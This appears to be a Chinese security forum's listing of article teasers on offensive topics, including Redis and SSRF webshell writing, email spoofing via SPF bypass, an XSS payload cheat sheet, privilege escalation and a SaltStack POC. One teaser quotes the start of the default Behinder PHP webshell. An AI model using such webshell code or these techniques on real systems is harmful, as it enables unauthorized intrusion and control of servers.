技术文章

对 Redis 在 Windows 下利用方式思考

我又来刷分了!~我的文章都是公开的, Github 和 博客还有公众号都会同步 0.。0-----------------我写的文章永远都是那么的又臭又长又菜。## 前言上次写了一篇有关 `SSRF` 打 `Redis` 主从的文章,居然被人喷了!!!说我根本就没有复现过张嘴就来??? 我没有理会,然后又有朋友在群问,`Redis` 在 `

2020-5-25 21:54 35 1587

投稿文章:记录一次游戏私服的渗透过程

## 记录一次游戏私服getshell过程> 晚上闲着无聊,想做点事情,用fofa搜了一下站点,想挖几个洞,结果看到了一个游戏私服的宣传网站,我这一看跟我之前搞过的一个站好像是一套源码。就试着想搞一搞,正好记录一下写个文章,废话不多说了,开搞。传统的游戏宣传页面,没啥东西试着一下输入了一下这套私

2020-5-20 22:28 10 216

投稿文章:记对一次攻击的追踪

## 开始昨天晚上,我正在房间里对着 CCNA 的题库练习,看到群里有人被攻击了因为是一次看起来并不怎么高明的渗透(被防火墙拦下),我也没怎么在意。等做完题库后,回去对这个IP进行查询,结果如下:我感觉事情开始有点问题。**由于本次事件中我电脑暂未修好,所以不会带有任何的本地反编译****求 dala

2020-5-19 18:24 3 181

邮件伪造之SPF绕过的5种思路

SMTP(SimpleMail Transfer Protocol)即简单邮件传输协议,正如名字所暗示的那样,它其实是一个非常简单的传输协议,无需身份认证,而且发件人的邮箱地址是可以由发信方任意声明的,利用这个特性可以伪造任意发件人。SPF 出现的目的,就是为了防止随意伪造发件人。SPF,全称为 Sender Policy Framework

2020-5-17 13:34 10 1630

xss漏洞模糊测试payload的最佳集合 2020版

# XSS_Cheat_Sheet_2020_Edition## 简介白帽赏金平台xss漏洞模糊测试有效载荷的最佳集合 2020版 <br>该备忘清单可用于漏洞猎人,安全分析,渗透测试人员,根据应用的实际情况,测试不同的payload,并观察响应内容,查找web应用的跨站点脚本漏洞,共计100+条xss漏洞测试小技巧 <br>本备忘录翻译自国外的`

2020-5-15 21:13 49 1305

通过 SSRF 操作 Redis 主从复制写 Webshell

十篇想看的文章中就有八篇是这样的。 真鸡儿烦人,连续签到了差不多一年还是这样,没办法只能先水上去了。自己转载自己公开的文章应该不会被 ban 吧?Author : R3start and 曲云杰2020年4月1日19:57:37废话说起来很巧,这篇文章早就写完了,当时写完的时候并没有发出去,因为本想着等曲老板的其他东

2020-5-9 19:54 44 5004

冰蝎马 那可有可无的密码 -- 在爆菊的路上越走越远

冰蝎马 那可有可无的密码 -- 在爆菊的路上越走越远下面这个是默认的冰蝎马:<?php@error_reporting(0);session_start();if (isset($_GET)){ $key=substr(md5(uniqid(rand())),16); $_SESSION=$key; print $key;}else{ $key=$_SESSION;$post=file_get_contents("php://input").'';if(!exten

2020-5-9 17:08 42 3198

pipePotato复现

今天见安全客发了篇"首发披露!pipePotato:一种新型的通用提权漏洞"的文章,找了找资料复现了一下这里是原文对于漏洞的简介,废话不多说直接起环境开始复现。这里用到的环境是Windows Server 2019 Datacenter,起一个iis,做个简单的web随便挂个asp的shell上去,蚁剑直接连上当前webshell权限是iis ap

2020-5-6 22:04 52 4381

SaltStack远程命令执行 CVE-2020-11651 工具POC检测

SaltStack远程命令执行 CVE-2020-11651 工具检测 , 阿里云漏洞预警:https://help.aliyun.com/noticelist/articleid/1060284512.htmlPOC github地址: https://github.com/0xc0d/CVE-2020-11651要使用py3, pip如果不是 9.0,需要手动安装缺少的库,或者强行指定 pip版本python3 -m pip install --us

2020-5-6 17:06 16 3025